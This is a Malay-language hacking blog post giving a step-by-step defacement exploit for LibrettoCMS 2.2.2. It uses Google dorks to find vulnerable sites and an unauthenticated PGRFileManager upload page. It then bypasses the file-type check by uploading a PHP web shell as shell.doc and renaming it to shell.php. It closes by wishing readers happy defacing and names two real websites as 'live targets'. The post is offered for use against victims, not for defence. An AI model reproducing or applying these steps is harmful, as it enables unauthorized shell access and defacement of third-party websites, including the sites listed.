LibrettoCMS 2.2.2 File Upload Deface

 By: Afif    00:18  Deface, Exploits, Hacking   No comments

Assalamualaikum dan salam sejahtera.Hari ini aku nak ajar exploit deface.Exploit ni terdapat pada LibrettoCMS 2.2.2.
Korang boleh upload shell php atau file deface html korang.

1. Mula-mula cari website dengan google dork :

- "Powered By Libretto CMS"

- inurl:/PGRFileManager.php

2. Buka website mana2 yang korang dapat dan tambah url ni:

/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

Contoh :

http://www.site.com/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

3. Kemudian akan keluar macam ni :

4. Kemudian korang click dekat anak panah warna Hijau kat tepi Files tu.Pilih shell php korang.tapi rename shell tu jadi shell.doc .

Lepas tu upload! lepas dah upload korang cari nama shell korang tadi dalam file manager tu.Kemudian rename pulak jadi shell.php .

Shell korang akan hilang dalam file manager tu.tapi sebenarnya masih ada :D

5. Untuk tengok hasil :

http://www.site.com/userfiles/shell.php

Itu saja! siap....selamat ber-deface...

Live target :
http://9floor.pl/js/libraries/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
http://www.thegioibaochi.com/admin/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

Incoming Search Terms :

• deface exploit
• Powered By Libretto CMS
• PGRFilemanager exploit
• cara nak godam deface website

Item Reviewed: LibrettoCMS 2.2.2 File Upload Deface Description: Rating: 5 Reviewed By Afif